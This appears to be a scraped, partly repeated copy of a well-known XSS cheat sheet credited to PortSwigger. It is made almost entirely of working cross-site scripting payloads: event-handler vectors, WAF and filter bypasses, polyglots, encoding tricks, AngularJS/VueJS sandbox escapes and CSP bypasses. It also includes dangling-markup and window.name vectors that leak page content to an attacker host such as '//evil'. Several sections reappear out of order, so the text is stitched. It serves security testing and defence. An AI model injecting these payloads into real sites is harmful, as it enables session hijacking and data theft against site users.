All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks

Dangling markup

Background attribute: <body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?

Link href stylesheet: <link rel=stylesheet href="//evil?

Link href icon: <link rel=icon href="//evil?

Meta refresh: <meta http-equiv=refresh content="0; http://evil?

Img to pass markup through src attribute: <img src="//evil? <image src="//evil?

Video using track element: <video><track default src="//evil?

Video using source element and src attribute: <video><source src="//evil?

Audio using source element and src attribute: <audio><source src="//evil?

Input src: <input type=image src="//evil?

Button using formaction: <form><button style="width:100%;height:100%" type=submit formaction="//evil?

Input using formaction: <form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?

Form using action: <button form=x style="width:100%;height:100%"><form id=x action="//evil?

Object data: <object data="//evil?

Iframe src: <iframe src="//evil?

Embed src: <embed src="//evil?

Embed src (unquoted): <embed src=//evil?

Use textarea to consume markup and post to external site: <form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using formtarget: <button form=x>XSS</button><form id=x action=//evil target='

Pass markup data through window.name using base target: <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

Pass markup data through window.name using formtarget: <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Using base href to pass data: <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/

Using embed window name to pass data from the page: <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using iframe window name to pass data from the page: <iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using object window name to pass data from the page: <object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using frame window name to pass data from the page: <frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Overwrite type attribute with image in hidden inputs: <input type=hidden type=image src="//evil?

Polyglots

Polyglot payload 1: javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3: javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/"`/+/onmouseover=1/+/[*/[]/+alert(/PortSwiggerRes/)//'>

WAF bypass global objects

Each vector is shown with window; the cheat sheet lists the same vector for every global object reference, so self, this, top, parent, frames and globalThis can each replace window below.

XSS into a JavaScript string, string concatenation: window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, comment syntax: window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, hex escape sequence: window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence and base64 encoded string: window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, octal escape sequence: window['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, unicode escape: window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, RegExp source property: window[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, Hieroglyphy/JSFuck (as printed on the page): window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

Classic vectors (XSS crypt)

Image src with JavaScript protocol: <img src="javascript:alert(1)">

Body background with JavaScript protocol: <body background="javascript:alert(1)">

Iframe data URLs no longer work, as modern browsers use a null origin: <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

Impossible labs

Title | Description | Length limit | Closest vector

Basic context, WAF blocks <[a-zA-Z]
This lab captures the scenario where you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag.
Length limit: N/A. Closest vector: N/A.

Script based injection, but quotes, forward slash and backslash are escaped
We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block.
The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.
Length limit: N/A. Closest vector: N/A.

innerHTML context, but no equals allowed
You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.
Length limit: N/A. Closest vector: N/A.

Basic context, length limit
This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters (<q/oncut=alert``), but can you beat it?
Length limit: 15. Closest vector: <q oncut=alert``

Attribute context, length limit
The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters: oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Length limit: 14. Closest vector: oncut=alert``

Basic context, length limit, arbitrary code
It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Length limit: 19. Closest vector: <q/oncut=eval(name)

Attribute context, length limit, arbitrary code
Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.
Length limit: 17. Closest vector: see link.

Injection occurs inside a frameset but before the body
We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Length limit: N/A. Closest vector: N/A.

Injection occurs inside single quoted string, only characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Length limit: N/A. Closest vector: N/A.

VBScript protocol used to work in IE: <a href=vbscript:MsgBox+1>XSS</a> <a href='#' onclick=vbs:Msgbox+1>XSS</a> <a href='#' onclick=VBS:Msgbox+1>XSS</a> <a href='#' onclick=vbscript:Msgbox+1>XSS</a> <a href='#' onclick=VBSCRIPT:Msgbox+1>XSS</a> <a href='#' language=vbs onclick=vbscript:Msgbox+1>XSS</a>

JScript compact was a minimal version of JS that wasn't widely used in IE: <a href='#' onclick=jscript.compact:alert(1)>test</a> <a href='#' onclick=JSCRIPT.COMPACT:alert(1)>test</a>

JScript.Encode allows encoded JavaScript: <a href='#' language=JScript.Encode onclick=#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@>XSS</a> <a href='#' onclick=JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@>XSS</a>

VBScript.Encode allows encoded VBScript: <iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@> <iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

JavaScript entities used to work in Netscape Navigator: <a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator: <link href="xss.js" rel=stylesheet type="text/javascript">

Button used to consume markup: <form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup: <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL, Firefox only <= 2: <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">

XBL also worked in FF3.5 using data URLs: <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)" />

CSS expressions, <= IE7: <div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>

In quirks mode IE allowed you to use = instead of : <div style=xss=expression(alert(1))> <div style="color&#x3d;red">test</div>

Behaviors for older modes of IE: <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions: <script> function window.onload() { alert(1); } </script> <script> function window::onload() { alert(1); } </script> <script> function window.location() { } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> <body> <script> function document.body.innerHTML() { x = "<img src=1 onerror=alert(1)>"; } </script> </body>

GreyMagic HTML+time exploit (no longer works, even in 5 docmode): <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Firefox allows NULLs after & (the NULL byte is not visible here): <a href="javascript&#x6a;avascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities (the NULL byte is not visible here): <a href="javascript&colon;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening comments (the NULL byte is not visible here): <!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="--><iframe/onload=alert(1)>"> -->

Safari used to allow any tag to have an onload event inside SVG: <svg><xss onload=alert(1)>

Isindex using src attribute: <isindex type=image src="//evil?

Isindex using submit: <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?

Isindex and formaction: <isindex type=submit formaction=javascript:alert(1)>

Isindex and action: <isindex type=submit action=javascript:alert(1)>

Credits

Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C, gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.


onseeked | Requires clicking the element timeline | <audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

onseeking | Requires clicking the element timeline | <audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

onselect | Requires you select text | <input onselect=alert(1) value="XSS" autofocus>

onselectionchange | Fires when text selection is changed on the page | <body onselectionchange=alert(1)>select some text

onselectstart | Fires when beginning a text selection | <body onselectstart=alert(1)>select some text

onshow | Fires when the context menu is shown | <div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>

onsubmit | Requires a form submission | <form onsubmit=alert(1)><input type=submit>

ontouchend | Fires when a touch on the screen ends (mobile devices only) | <body ontouchend=alert(1)>

ontouchmove | Fires when a touch on the screen moves (mobile devices only) | <body ontouchmove=alert(1)>

ontouchstart | Fires when a touch on the screen starts (mobile devices only) | <body ontouchstart=alert(1)>

onvolumechange | Requires volume adjustment | <audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

onwheel | Fires when you use the mouse wheel | <body onwheel=alert(1)>

Restricted characters

No parentheses using exception handling: <script>onerror=alert;throw 1</script>

No parentheses using exception handling, no semicolons: <script>{onerror=alert}throw 1</script>

No parentheses using exception handling, no semicolons, using expressions: <script>throw onerror=alert,1</script>

No parentheses using exception handling and eval: <script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses using exception handling and eval on Firefox: <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>

No parentheses using ES6 hasInstance and instanceof with eval: <script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

No parentheses using ES6 hasInstance and instanceof with eval, without a dot: <script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

No parentheses using location redirect: <script>location='javascript:alert\x281\x29'</script>

No parentheses using location redirect, no strings: <script>location=name</script>

No parentheses using template strings: <script>alert`1`</script>

No parentheses using template strings and location hash: <script>new Function`X${document.location.hash.substr`1`}`</script>

No parentheses or spaces using template strings and location hash: <script>Function`X${document.location.hash.substr`1`}```</script>

Frameworks

Bootstrap onanimationstart event: <xss class=progress-bar-animated onanimationstart=alert(1)>

Bootstrap ontransitionend event: <xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>

Protocols

Iframe src attribute with JavaScript protocol: <iframe src="javascript:alert(1)">

Object data attribute with JavaScript protocol: <object data="javascript:alert(1)">

Embed src attribute with JavaScript protocol: <embed src="javascript:alert(1)">

A standard JavaScript protocol: <a href="javascript:alert(1)">XSS</a>

The protocol is not case sensitive: <a href="JaVaScript:alert(1)">XSS</a>

Characters \x01-\x20 are allowed before the protocol (here a space): <a href=" javascript:alert(1)">XSS</a>

Characters \x09, \x0a, \x0d are allowed inside the protocol (the gap stands for one of them): <a href="javas cript:alert(1)">XSS</a>

Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon (the gap stands for one of them): <a href="javascript :alert(1)">XSS</a>

Xlink namespace inside SVG with JavaScript protocol: <svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

SVG animate tag using values: <svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

SVG animate tag using to: <svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>

SVG set tag: <svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

Data protocol inside script src: <script src="data:text/javascript,alert(1)"></script>

SVG script href attribute without closing script tag: <svg><script href="data:text/javascript,alert(1)" />

SVG use element (Chrome/Firefox): <svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>

Import statement with data URL: <script>import('data:text/javascript,alert(1)')</script>

Base tag with JavaScript protocol rewriting relative URLs: <base href="javascript:/a/-alert(1)//"><a href=../lol/safari.html>test</a>

MathML makes any tag clickable: <math><x href="javascript:alert(1)">blah

Button and formaction: <form><button formaction=javascript:alert(1)>XSS

Input and formaction: <form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action: <form action=javascript:alert(1)><input type=submit value=XSS>

Use element with an external URL: <svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>

Animate tag with keytimes and multiple values: <svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

Other useful attributes

Using srcdoc attribute: <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities: <iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>

Click a submit element from anywhere on the page, even outside the form: <form action=javascript:alert(1)><input type=submit id=x></form><label for=x>XSS</label>

Hidden inputs: access key attributes can enable XSS on normally unexploitable elements: <input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)

Link elements: access key attributes can enable XSS on normally unexploitable elements: <link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)

Download attribute can save a copy of the current webpage: <a href=# download="filename.html">Test</a>

Disable referrer using referrerpolicy: <img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Set window.name via parameter on the window.open function: <a href="#" onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//','alert(1)')">XSS</a>

Set window.name via name attribute in an <iframe> tag: <iframe name="alert(1)" src="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//"></iframe>

Set window.name via target attribute in a <base> tag: <base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//">XSS via target in base tag</a>

Set window.name via target attribute in an <a> tag: <a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//">XSS via target in a tag</a>

Set window.name via usemap attribute in an <img> tag: <img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//"></map>

Set window.name via target attribute in a <form> tag: <form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name);//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>

Set window.name via formtarget attribute in an <input> tag, type submit: <form><input type=hidden name=x value="';eval(name);//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>

Set window.name via formtarget attribute in an <input> tag, type image: <form><input type=hidden name=x value="';eval(name);//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>

Special tags

Redirect to a different domain: <meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Meta charset attribute UTF-7: <meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta charset UTF-7: <meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 1: +/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 2: +/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 3: +/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 4: +/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Upgrade insecure requests: <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

Disable JavaScript via iframe sandbox: <iframe sandbox src="//portswigger-labs.net"></iframe>

Disable referrer: <meta name="referrer" content="no-referrer">

Encoding

Overlong UTF-8: %C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>

Unicode escapes: <script>\u0061lert(1)</script>

Unicode escapes, ES6 style: <script>\u{61}lert(1)</script>

Unicode escapes, ES6 style, zero padded: <script>\u{0000000061}lert(1)</script>

Hex encoding, JavaScript escapes: <script>eval('\x61lert(1)')</script>

Octal encoding: <script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>

Decimal encoding with optional semicolon: <a href="&#106;avascript:alert(1)">XSS</a><a href="&#106avascript:alert(1)">XSS</a>

SVG script with HTML encoding: <svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>

Decimal encoding with padded zeros: <a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding entities: <a href="&#x6a;avascript:alert(1)">XSS</a>

Hex encoding without semicolon, provided the next character is not a-f0-9: <a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>

Hex encoding with padded zeros: <a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive: <a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities: <a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>

URL encoding: <a href="javascript:x='%27-alert(1)-%27'">XSS</a>

HTML entities and URL encoding: <a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>

Obfuscation

Data protocol inside script src with base64: <script src="data:text/javascript;base64,YWxlcnQoMSk="></script>

Data protocol inside script src with base64 and HTML entities: <script src="data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;"></script>

Data protocol inside script src with base64 and URL encoding: <script src="data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d"></script>

Iframe srcdoc HTML encoded: <iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>

Iframe JavaScript URL with HTML and URL encoding: <iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>

SVG script with unicode escapes and HTML encoding: <svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>

Client-side template injection

VueJS reflected

Version | Author | Length | Vector

All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}

All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>

All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>

All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>

AngularJS sandbox escapes reflected

Version | Author | Length | Vector

1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}

1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}

1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)

1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)

1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)

1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )) )}}

1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}

1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}

1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}

1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}

>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}

>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes (using orderBy or no $eval)

Columns: version, author, length, vector

1.0.1 - 1.1.5, Mario Heiderich (Cure53), 37 chars:
constructor.constructor('alert(1)')()

1.2.0 - 1.2.18, Jan Horn (Google), 118 chars:
a="constructor";b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,"alert(1)")()

1.2.19 - 1.2.23, Mathias Karlsson (Detectify), 119 chars:
toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)

1.2.24 - 1.2.26, Gareth Heyes (PortSwigger), 317 chars:
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()

1.2.27 - 1.2.29, 1.3.0 - 1.3.20, Gareth Heyes (PortSwigger), 20 chars:
{}.")));alert(1)//";

1.4.0 - 1.4.5, Gareth Heyes (PortSwigger), 75 chars:
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';

>=1.6.0, Mario Heiderich (Cure53), 37 chars:
constructor.constructor('alert(1)')()

1.4.4 (without strings), Gareth Heyes (PortSwigger), 134 chars:
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses

Columns: version, author, length, vector

All versions (Chrome), Gareth Heyes (PortSwigger), 81 chars:
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">

All versions (Chrome) shorter, Gareth Heyes (PortSwigger), 56 chars:
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>

All versions (all browsers) shorter, Gareth Heyes (PortSwigger), 91 chars:
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

1.2.0 - 1.5.0, Eduardo Vela (Google), 190 chars:
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>

All versions (Chrome) shorter via oncut, Savan Gadhiya (NotSoSecure), 49 chars:
<input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks

Dangling markup

Background attribute
<body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?

Link href stylesheet: <link rel=stylesheet href="//evil?

Link href icon: <link rel=icon href="//evil?

Meta refresh: <meta http-equiv="refresh" content="0; http://evil?

